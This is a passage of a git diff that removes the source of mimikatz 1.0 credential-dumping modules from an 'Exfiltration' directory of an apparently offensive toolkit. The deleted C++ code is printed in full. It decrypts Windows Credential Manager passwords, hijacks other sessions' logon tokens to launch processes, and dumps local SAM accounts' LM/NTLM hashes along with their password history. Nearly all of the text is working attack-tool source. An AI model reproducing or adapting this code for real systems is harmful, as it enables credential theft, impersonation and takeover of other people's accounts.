(credman KO)"; - return sendTo(monPipe, message.str()); -} - -wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix) -{ - wostringstream monStream; - - LSA_UNICODE_STRING encryptedPassword = {pEncryptedCredential->Cred.CredentialBlobSize, pEncryptedCredential->Cred.CredentialBlobSize, reinterpret_cast<PWSTR>(pEncryptedCredential->Cred.CredentialBlob)}; - wstring cred = getPasswordFromProtectedUnicodeString(&encryptedPassword); - - if(justSecurity) - monStream << L"- {" << pEncryptedCredential->Cred.UserName << L" ; " << cred << L" } "; - else monStream << - L"\t " << prefix << L"User : " << pEncryptedCredential->Cred.UserName << endl << - L"\t " << prefix << L"Cred : " << cred << endl; - - return monStream.str(); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h deleted file mode 100644 index 60d1249..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -bool searchCredmanFuncs(); -__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments); -bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); - -wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix = L""); - -typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE) (IN PLUID pLUID, IN DWORD unk0, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); -typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); - diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp deleted file mode 100644 index 7284da7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp +++ /dev/null @@ -1,88 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "incognito.h" - -bool searchIncognitoFuncs() -{ - return searchLSAFuncs(); -} - -__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getTokenData, wstring(L"token"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - if(searchIncognitoFuncs()) - { - if(!mesArguments->empty() && ((mesArguments->size() == 3) || (mesArguments->size() == 4))) - { - wstring idSecAppHigh = L"0", idSecAppLow = mesArguments->front(), session = mesArguments->at(1), maLigne = mesArguments->back(); - if(mesArguments->size() == 4) - { - idSecAppHigh = idSecAppLow; - idSecAppLow = mesArguments->at(1); - session = mesArguments->at(2); - } - LUID monLUID = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - DWORD maSession = _wtoi(session.c_str()); - HANDLE monToken; - monStream << L" * OpenTokenByLogonId({" << monLUID.LowPart << L";" << monLUID.HighPart << L"}) : "; - NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(&monLUID, &monToken); - if(NT_SUCCESS(status)) - { - monStream << L"OK !" << endl << - L" * SetTokenInformation(TokenSessionId@" << maSession << L") : "; - if(SetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD)) != 0) - { - monStream << L"OK !" << endl << - L" * CreateProcessAsUser(Token@{" << monLUID.LowPart << L";" << monLUID.HighPart << L"}, TokenSessionId@" << maSession << L", \"" << maLigne << L"\") : "; - PROCESS_INFORMATION mesInfosProcess; - if(mod_process::start(&maLigne, &mesInfosProcess, false, false, monToken)) - { - monStream << L"OK - pid = " << mesInfosProcess.dwProcessId << endl; - CloseHandle(mesInfosProcess.hThread); - CloseHandle(mesInfosProcess.hProcess); - } - else monStream << L"KO - " << mod_system::getWinError() << endl; - CloseHandle(monToken); - } - else monStream << L"KO - " << mod_system::getWinError() << endl; - } - else monStream << L"KO - " << mod_system::getWinError(false, status) << endl; - } - else monStream << L"Format d\'appel invalide : incognito [idSecAppHigh] idSecAppLow sessionDst ligneDeCommande" << endl; - } - return sendTo(monPipe, monStream.str()); -} - -bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream monStream; - if(searchIncognitoFuncs()) - { - HANDLE monToken; - NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(logId, &monToken); - if(NT_SUCCESS(status)) - { - monStream << L"Disponible !"; - DWORD maSession, tailleRetournee; - if(GetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD), &tailleRetournee) != 0) - { - monStream << L" - session d\'origine " << maSession; - CloseHandle(monToken); - } - else monStream << L"Indisponible - SetTokenInformation KO : " << mod_system::getWinError() << endl; - } - else monStream << L"OpenTokenByLogonId KO : " << mod_system::getWinError(false, status) << endl; - } - return sendTo(monPipe, monStream.str()); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h deleted file mode 100644 index a8eae58..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h +++ /dev/null @@ -1,13 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -bool searchIncognitoFuncs(); -__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments); -bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp deleted file mode 100644 index 5555b58..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp +++ /dev/null @@ -1,479 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "sam.h" - -PSAM_I_CONNECT SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(NULL); -PSAM_R_OPEN_DOMAIN SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(NULL); -PSAM_R_OPEN_USER SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(NULL); -PSAM_R_ENUMERATE_USERS_IN_DOMAIN SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(NULL); -PSAM_R_QUERY_INFORMATION_USER SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(NULL); -PSAM_I_FREE_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(NULL); -PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(NULL); -PSAM_R_CLOSE_HANDLE SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(NULL); -PSAM_I_GET_PRIVATE_DATA SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(NULL); -PSYSTEM_FUNCTION_025 SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(NULL); -PSYSTEM_FUNCTION_027 SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(NULL); - -bool searchSAMFuncs() -{ - if(!(SamIConnect && - SamrOpenDomain && - SamrOpenUser && - SamrEnumerateUsersInDomain && - SamrQueryInformationUser && - SamIFree_SAMPR_USER_INFO_BUFFER && - SamIFree_SAMPR_ENUMERATION_BUFFER && - SamrCloseHandle && - SamIGetPrivateData && - SystemFunction025 && - SystemFunction027)) - { - HMODULE hSamsrv = GetModuleHandle(L"samsrv"); - HMODULE hAdvapi32 = GetModuleHandle(L"advapi32"); - - if(hSamsrv && hAdvapi32) - { - SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(GetProcAddress(hSamsrv, "SamIConnect")); - SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(GetProcAddress(hSamsrv, "SamrOpenDomain")); - SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(GetProcAddress(hSamsrv, "SamrOpenUser")); - SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(GetProcAddress(hSamsrv, "SamrEnumerateUsersInDomain")); - SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(GetProcAddress(hSamsrv, "SamrQueryInformationUser")); - SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER")); - SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER")); - SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(GetProcAddress(hSamsrv, "SamrCloseHandle")); - SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(GetProcAddress(hSamsrv, "SamIGetPrivateData")); - SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(GetProcAddress(hAdvapi32, "SystemFunction025")); - SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(GetProcAddress(hAdvapi32, "SystemFunction027")); - } - return (SamIConnect && - SamrOpenDomain && - SamrOpenUser && - SamrEnumerateUsersInDomain && - SamrQueryInformationUser && - SamIFree_SAMPR_USER_INFO_BUFFER && - SamIFree_SAMPR_ENUMERATION_BUFFER && - SamrCloseHandle); - } - else return true; -} - -__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** samsrv.dll/advapi32.dll ** ; Statut recherche : " << (searchSAMFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@SamIConnect = " << SamIConnect << endl << - L"@SamrOpenDomain = " << SamrOpenDomain << endl << - L"@SamrOpenUser = " << SamrOpenUser << endl << - L"@SamrEnumerateUsersInDomain = " << SamrEnumerateUsersInDomain << endl << - L"@SamrQueryInformationUser = " << SamrQueryInformationUser << endl << - L"@SamIFree_SAMPR_USER_INFO_BUFFER = " << SamIFree_SAMPR_USER_INFO_BUFFER << endl << - L"@SamIFree_SAMPR_ENUMERATION_BUFFER = " << SamIFree_SAMPR_ENUMERATION_BUFFER << endl << - L"@SamrCloseHandle = " << SamrCloseHandle << endl << - L"@SamIGetPrivateData = " << SamIGetPrivateData << endl << - L"@SystemFunction025 = " << SystemFunction025 << endl << - L"@SystemFunction027 = " << SystemFunction027 << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - if(searchSAMFuncs()) - { - bool sendOk = true, history = true, isCSV = false; - USER_INFORMATION_CLASS monType = UserInternal1Information; - - if(!mesArguments->empty()) - { - isCSV = ((_wcsicmp(mesArguments->front().c_str(), L"/csv") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/csv") == 0); - monType = (((_wcsicmp(mesArguments->front().c_str(), L"/full") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/full") == 0) ? UserAllInformation : UserInternal1Information); - } - - LSA_HANDLE handlePolicy = NULL; - HSAM handleSam = NULL; - HDOMAIN handleDomain = NULL; - HUSER handleUser = NULL; - - LSA_OBJECT_ATTRIBUTES objectAttributes; - memset(&objectAttributes, NULL, sizeof(objectAttributes)); - PPOLICY_ACCOUNT_DOMAIN_INFO ptrPolicyDomainInfo; - - NTSTATUS retourEnum = 0; - PSAMPR_ENUMERATION_BUFFER ptrStructEnumUser = NULL; - DWORD EnumerationContext = 0; - DWORD EnumerationSize = 0; - - PSAMPR_USER_INFO_BUFFER ptrMesInfosUsers = NULL; - - if(NT_SUCCESS(LsaOpenPolicy(NULL, &objectAttributes, POLICY_ALL_ACCESS, &handlePolicy))) - { - if(NT_SUCCESS(LsaQueryInformationPolicy(handlePolicy, PolicyAccountDomainInformation, reinterpret_cast<PVOID *>(&ptrPolicyDomainInfo)))) - { - if(NT_SUCCESS(SamIConnect(NULL, &handleSam, 1, SAM_SERVER_CONNECT))) - { - if(NT_SUCCESS(SamrOpenDomain(handleSam, DOMAIN_ALL_ACCESS, ptrPolicyDomainInfo->DomainSid, &handleDomain))) - { - wstring domainName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); - do - { - retourEnum = SamrEnumerateUsersInDomain(handleDomain, &EnumerationContext, NULL, &ptrStructEnumUser, 1000, &EnumerationSize); - if(NT_SUCCESS(retourEnum) || retourEnum == STATUS_MORE_ENTRIES) - { - for(DWORD numUser = 0; numUser < ptrStructEnumUser->EntriesRead && sendOk; numUser++) - { - wstring monUserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); - ptrMesInfosUsers = NULL; - - if(NT_SUCCESS(SamrOpenUser(handleDomain, USER_ALL_ACCESS, ptrStructEnumUser->Buffer[numUser].RelativeId, &handleUser))) - { - if(NT_SUCCESS(SamrQueryInformationUser(handleUser, monType, &ptrMesInfosUsers))) - { - WUserAllInformation mesInfos = UserInformationsToStruct(monType, ptrMesInfosUsers); - mesInfos.UserId = ptrStructEnumUser->Buffer[numUser].RelativeId; - mesInfos.DomaineName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); - - if(mesInfos.UserName.empty()) - mesInfos.UserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); - - sendOk = descrToPipeInformations(monPipe, monType, mesInfos, isCSV); - SamIFree_SAMPR_USER_INFO_BUFFER(ptrMesInfosUsers, monType); - } - - if(history && SamIGetPrivateData != NULL) - { - sendOk = descrUserHistoryToPipe(monPipe, ptrStructEnumUser->Buffer[numUser].RelativeId, monUserName, domainName, handleUser, monType, isCSV); - } - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleUser)); - } - else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir l\'objet utilisateur\n"); - } - SamIFree_SAMPR_ENUMERATION_BUFFER(ptrStructEnumUser); - } - else sendOk = sendTo(monPipe, L"Echec dans l\'obtention de la liste des objets\n"); - - } while(retourEnum == STATUS_MORE_ENTRIES && sendOk); - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleDomain)); - } - else sendOk = sendTo(monPipe, L"Impossible d\'obtenir les information sur le domaine\n"); - SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleSam)); - } - else sendOk = sendTo(monPipe, L"Impossible de se connecter la base de scurit du domaine\n"); - LsaFreeMemory(ptrPolicyDomainInfo); - } - else sendOk = sendTo(monPipe, L"Impossible d\'obtenir des informations sur la politique de scurit\n"); - LsaClose(handlePolicy); - } - else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir la politique de scurit\n"); - - return sendOk; - } - else return getSAMFunctions(monPipe, mesArguments); -} - -bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV) -{ - wstringstream maReponse; - - switch(type) - { - case UserInternal1Information: - if(isCSV) - { - maReponse << - mesInfos.UserId << L";" << - mesInfos.UserName << L";" << - mesInfos.DomaineName << L";" << - mesInfos.LmOwfPassword << L";" << - mesInfos.NtOwfPassword << L";" - ; - } - else - { - maReponse << - L"ID : " << mesInfos.UserId << endl << - L"Nom : " << mesInfos.UserName << endl << - L"Domaine : " << mesInfos.DomaineName << endl << - L"Hash LM : " << mesInfos.LmOwfPassword << endl << - L"Hash NTLM : " << mesInfos.NtOwfPassword << endl - ; - } - break; - case UserAllInformation: - if(isCSV) - { - maReponse << - mesInfos.UserId << L';' << - mesInfos.UserName << L';' << - mesInfos.DomaineName << L';' << - protectMe(mesInfos.FullName) << L';' << - mesInfos.isActif << L';' << - mesInfos.isLocked << L';' << - mesInfos.TypeCompte << L';' << - protectMe(mesInfos.UserComment) << L';' << - protectMe(mesInfos.AdminComment) << L';' << - mesInfos.AccountExpires_strict << L';' << - protectMe(mesInfos.WorkStations) << L';' << - protectMe(mesInfos.HomeDirectory) << L';' << - protectMe(mesInfos.HomeDirectoryDrive) << L';' << - protectMe(mesInfos.ProfilePath) << L';' << - protectMe(mesInfos.ScriptPath) << L';' << - mesInfos.LogonCount << L';' << - mesInfos.BadPasswordCount << L';' << - mesInfos.LastLogon_strict << L';' << - mesInfos.LastLogoff_strict << L';' << - mesInfos.PasswordLastSet_strict << L';' << - mesInfos.isPasswordNotExpire << L';' << - mesInfos.isPasswordNotRequired << L';' << - mesInfos.isPasswordExpired << L';' << - mesInfos.PasswordCanChange_strict << L';' << - mesInfos.PasswordMustChange_strict << L';' << - mesInfos.LmOwfPassword << L';' << - mesInfos.NtOwfPassword << L';' - ; - } - else - { - maReponse << boolalpha << - L"Compte" << endl << - L"======" << endl << - L"ID : " << mesInfos.UserId << endl << - L"Nom : " << mesInfos.UserName << endl << - L"Domaine : " << mesInfos.DomaineName << endl << - L"Nom complet : " << mesInfos.FullName << endl << - L"Actif : " << mesInfos.isActif << endl << - L"Verouill : " << mesInfos.isLocked << endl << - L"Type : " << mesInfos.TypeCompte << endl << - L"Commentaire utilisateur : " << mesInfos.UserComment << endl << - L"Commentaire admin : " << mesInfos.AdminComment << endl << - L"Expiration : " << mesInfos.AccountExpires << endl << - L"Station(s) : " << mesInfos.WorkStations << endl << - endl << - L"Chemins" << endl << - L"-------" << endl << - L"Rpertoire de base : " << mesInfos.HomeDirectory << endl << - L"Lecteur de base : " << mesInfos.HomeDirectoryDrive << endl << - L"Profil : " << mesInfos.ProfilePath << endl << - L"Script de dmarrage : " << mesInfos.ScriptPath << endl << - endl << - L"Connexions" << endl << - L"----------" << endl << - L"Nombre : " << mesInfos.LogonCount << endl << - L"Echecs : " << mesInfos.BadPasswordCount << endl << - L"Dernire connexion : " << mesInfos.LastLogon << endl << - L"Dernire dconnexion : " << mesInfos.LastLogoff << endl << - endl << - L"Mot de passe" << endl << - L"------------" << endl << - L"Dernier changement : " << mesInfos.PasswordLastSet << endl << - L"N\'expire pas : " << mesInfos.isPasswordNotExpire << endl << - L"Peut tre vide : " << mesInfos.isPasswordNotRequired << endl << - L"Mot de passe expir : " << mesInfos.isPasswordExpired << endl << - L"Possibilit changement : " << mesInfos.PasswordCanChange << endl << - L"Obligation changement : " << mesInfos.PasswordMustChange << endl << - endl << - L"Hashs" << endl << - L"-----" << endl << - L"Hash LM : " << mesInfos.LmOwfPassword << endl << - L"Hash NTLM : " << mesInfos.NtOwfPassword << endl << - endl - ; - } - break; - } - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} - -WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr) -{ - WUserAllInformation mesInfos; - PSAMPR_USER_INTERNAL1_INFORMATION ptrPassword = NULL; - PSAMPR_USER_ALL_INFORMATION ptrAllInformations = NULL; - - switch(type) - { - case UserInternal1Information: - ptrPassword = reinterpret_cast<PSAMPR_USER_INTERNAL1_INFORMATION>(monPtr); - - mesInfos.LmPasswordPresent = ptrPassword->LmPasswordPresent != 0; - mesInfos.NtPasswordPresent = ptrPassword->NtPasswordPresent != 0; - - if(mesInfos.LmPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedLmOwfPassword.data, sizeof(ptrPassword->EncryptedLmOwfPassword.data)); - if(mesInfos.NtPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedNtOwfPassword.data, sizeof(ptrPassword->EncryptedNtOwfPassword.data)); - break; - - case UserAllInformation: - ptrAllInformations = reinterpret_cast<PSAMPR_USER_ALL_INFORMATION>(monPtr); - - mesInfos.UserId = ptrAllInformations->UserId; - mesInfos.UserName = mod_text::stringOfSTRING(ptrAllInformations->UserName); - mesInfos.FullName = mod_text::stringOfSTRING(ptrAllInformations->FullName); correctMe(mesInfos.FullName); - - mesInfos.isActif = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_DISABLED) == 0; - mesInfos.isLocked = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_AUTO_LOCKED) != 0; - - if(ptrAllInformations->UserAccountControl & USER_SERVER_TRUST_ACCOUNT) - mesInfos.TypeCompte.assign(L"Contrleur de domaine"); - else if(ptrAllInformations->UserAccountControl & USER_WORKSTATION_TRUST_ACCOUNT) - mesInfos.TypeCompte.assign(L"Ordinateur"); - else if(ptrAllInformations->UserAccountControl & USER_NORMAL_ACCOUNT) - mesInfos.TypeCompte.assign(L"Utilisateur"); - else - mesInfos.TypeCompte.assign(L"Inconnu"); - - mesInfos.UserComment = mod_text::stringOfSTRING(ptrAllInformations->UserComment); correctMe(mesInfos.AdminComment); - mesInfos.AdminComment = mod_text::stringOfSTRING(ptrAllInformations->AdminComment); correctMe(mesInfos.AdminComment); - mesInfos.AccountExpires = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires); - mesInfos.AccountExpires_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires, true); - mesInfos.WorkStations = mod_text::stringOfSTRING(ptrAllInformations->WorkStations); - mesInfos.HomeDirectory = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectory); correctMe(mesInfos.HomeDirectory); - mesInfos.HomeDirectoryDrive = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectoryDrive); correctMe(mesInfos.HomeDirectoryDrive); - mesInfos.ProfilePath = mod_text::stringOfSTRING(ptrAllInformations->ProfilePath); correctMe(mesInfos.ProfilePath); - mesInfos.ScriptPath = mod_text::stringOfSTRING(ptrAllInformations->ScriptPath); correctMe(mesInfos.ScriptPath); - mesInfos.LogonCount = ptrAllInformations->LogonCount; - mesInfos.BadPasswordCount = ptrAllInformations->BadPasswordCount; - mesInfos.LastLogon = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon); - mesInfos.LastLogon_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon, true); - mesInfos.LastLogoff = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff); - mesInfos.LastLogoff_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff, true); - mesInfos.PasswordLastSet = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet); - mesInfos.PasswordLastSet_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet, true); - mesInfos.isPasswordNotExpire = (ptrAllInformations->UserAccountControl & USER_DONT_EXPIRE_PASSWORD) != 0; - mesInfos.isPasswordNotRequired = (ptrAllInformations->UserAccountControl & USER_PASSWORD_NOT_REQUIRED) != 0; - mesInfos.isPasswordExpired = ptrAllInformations->PasswordExpired != 0; - mesInfos.PasswordCanChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange); - mesInfos.PasswordCanChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange, true); - mesInfos.PasswordMustChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange); - mesInfos.PasswordMustChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange, true); - mesInfos.LmPasswordPresent = ptrAllInformations->LmPasswordPresent != 0; - mesInfos.NtPasswordPresent = ptrAllInformations->NtPasswordPresent != 0; - - if(mesInfos.LmPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->LmOwfPassword.Buffer), ptrAllInformations->LmOwfPassword.Length); - if(mesInfos.NtPasswordPresent) - mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->NtOwfPassword.Buffer), ptrAllInformations->NtOwfPassword.Length); - - break; - } - return mesInfos; -} - -bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV) -{ - WUserAllInformation mesInfos; - mesInfos.DomaineName = domainName; - mesInfos.UserId = rid; - - DWORD Context = 2, Type = 0, tailleBlob; - PWHashHistory pMesDatas = NULL; - bool sendOk = true; - - if(NT_SUCCESS(SamIGetPrivateData(handleUser, &Context, &Type, &tailleBlob, &pMesDatas))) - { - unsigned short nbEntrees = min(pMesDatas->histNTLMsize, pMesDatas->histLMsize) / 16; - - for(unsigned short i = 1; i < nbEntrees && sendOk; i++) - { - BYTE monBuff[16] = {0}; - - wostringstream userNameQualif; - userNameQualif << monUserName << L"{p-" << i << L"}"; - mesInfos.UserName = userNameQualif.str(); - - if(NT_SUCCESS(SystemFunction025(pMesDatas->hashs[nbEntrees + i], &rid, monBuff))) - { - mesInfos.LmPasswordPresent = 1; - mesInfos.LmOwfPassword = mod_text::stringOfHex(monBuff, 0x10); - } - else - { - mesInfos.LmPasswordPresent = 0; - mesInfos.LmOwfPassword = L"chec de dcodage :("; - } - - if(NT_SUCCESS(SystemFunction027(pMesDatas->hashs[i], &rid, monBuff))) - { - mesInfos.NtPasswordPresent = 1; - mesInfos.NtOwfPassword = mod_text::stringOfHex(monBuff, 0x10); - } - else - { - mesInfos.NtPasswordPresent = 0; - mesInfos.NtOwfPassword = L"chec de dcodage :("; - } - - sendOk = descrToPipeInformations(monPipe, type, mesInfos, isCSV); - } - LocalFree(pMesDatas); - } - return sendOk; -} - -wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict) -{ - wostringstream reponse; - - if(monInt.LowPart == ULONG_MAX && monInt.HighPart == LONG_MAX) - { - if(!isStrict) - reponse << L"N\'arrive jamais"; - } - else if(monInt.LowPart == 0 && monInt.HighPart == 0) - { - if(!isStrict) - reponse << L"N\'est pas encore arriv"; - } - else - { - SYSTEMTIME monTimeStamp; - if(FileTimeToSystemTime(reinterpret_cast<PFILETIME>(&monInt), &monTimeStamp) != FALSE) - { - reponse << dec << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wDay << L"/" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMonth << L"/" << - setw(4)<< setfill(wchar_t('0')) << monTimeStamp.wYear << L" " << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wHour << L":" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMinute << L":" << - setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wSecond; - } - } - return reponse.str(); -} - -wstring protectMe(wstring &maChaine) -{ - wstring result; - if(!maChaine.empty()) - { - result = L"\""; - result.append(maChaine); - result.append(L"\""); - } - return result; -} - -void correctMe(wstring &maChaine) -{ - unsigned char source[] = {0x19, 0x20, 0x13, 0x20, 0xab, 0x00, 0xbb, 0x00, 0x26, 0x20}; - unsigned char replac[] = {'\'', 0 , '-' , 0 , '\"', 0 , '\"', 0, '.', 0 }; - - for(unsigned int i = 0; i < maChaine.size() ; i++) - { - const BYTE * monPtr = reinterpret_cast<const BYTE *>(&maChaine.c_str()[i]); - for(int j = 0 ; j < min(sizeof(source), sizeof(replac)) ; j+=2) - { - if(*monPtr == source[j] && *(monPtr + 1) == source[j+1]) - { - *const_cast<BYTE *>(monPtr) = replac[j]; - *const_cast<BYTE *>(monPtr + 1) = replac[j + 1]; - break; - } - } - } -}
